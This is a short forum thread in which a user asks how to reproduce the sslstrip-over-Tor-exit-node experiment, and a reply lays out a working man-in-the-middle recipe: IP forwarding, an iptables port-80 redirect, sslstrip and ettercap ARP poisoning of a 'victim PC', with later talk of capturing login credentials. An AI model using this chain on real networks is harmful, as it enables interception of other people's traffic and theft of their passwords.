Results 1 to 5 of 5

Thread: SSL Strip and Tor

  1. #1
    Just burned his ISO
    Join Date
    May 2009
    Posts
    15

    Default SSL Strip and Tor

    I am trying to recreate moxie's experiment of setting up a exit node and feeding the data to it. I know i could just arpspoof and use a second box (I have already done this logging on to my email and finding my own posts), but I don't want all the extra network traffic. I am guessing i would need to modify his iptables command but I have never worked much with network routing before. Does anyone have a good tutorial on how I would set up somthing similar (information exiting your computer destined to port 80 rerouted back to port 10000 without mucking up the information in the IP header and having the response return to the correct port.) If i just run sslstrip and connect out using a browser sslstrip does not record anything.

    Any help would be greatly appreciated.

  2. #2
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Did you search this forum or google? Try this.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  3. #3
    Just burned his ISO
    Join Date
    May 2009
    Posts
    15

    Default

    Quote Originally Posted by kazalku View Post
    Did you search this forum or google? *snip because i have not posted 15 times yet*.
    Yes i did search I found 5 different threads (including the one you linked) I was considering posting to, but every single one i found was talking about problems/HOWTOs with using arpspoof/ettercap. I decided to make a new one because I was looking for a cleaner implication that did not flood the network with arp packets. Thank you for the link, but do you know if ettercap has the same limitation as arpspoof of not being able to redirect packets originating from yourself?

    I will try and see if I can target myself with ettercap later today when i have time to try again.

    Thank you for the link,
    leftler

  4. #4
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Follow that tut and modify the last line to attack only one PC and see if it serves your purpose -

    a) echo "1" > /proc/sys/net/ipv4/ip_forward

    b) iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    c) python sslstrip.py -k -p -l 10000

    d) ettercap -i eth1 -Tq -M ARP /192.168.1.1/ /192.168.1.2/ -P autoadd
    where 192.168.1.1 is router & 192.168.1.2 is victim PC. I'm not 100% sure about the format (check ettercap manual)..
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  5. #5
    Just burned his ISO
    Join Date
    May 2009
    Posts
    15

    Default

    You can not arp poison yourself with ettercap, I just tried.

    I think I may be unclear about what I am trying to do. I am trying to recreate Moxi's experiment where he hosted a tor exit node then he MITM the output through sslstrip before going out to the internet. I know this can be done with one box, I just do not have the knowledge to do it. What I need is sslstrip to strip outgoing connections originating from the same box that sslstrip is running on.

    On another note ettercap is great for putting the user/pass combination in to a readable format but when I do the arp poisoning it does not have them show up(even if it was normal http login, i use tinyurl.com/fakelogin to test), however if I open a second instance with ettercap -i eth0 -Tq that instance will have the passwords show up. Am i doing something wrong in ettercap or is that just a limitation?


    P.S. I know some of you may not want to help because this sounds like a script kiddy request who just wants my space passwords, but if that is all i wanted I could just easily do the two box method and get them that way. I am doing this experiment to learn advanced network administration in *nix systems. I am even willing to do the effort to read man pages to learn, I just need to be pointed in the right direction to know where to begin looking. I know arp poisoning myself is not the correct approach but what is? A fake adapter, iptablels, a privoxy setting, a named pipe? Any help would be greatly appreciated.

    -leftler

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •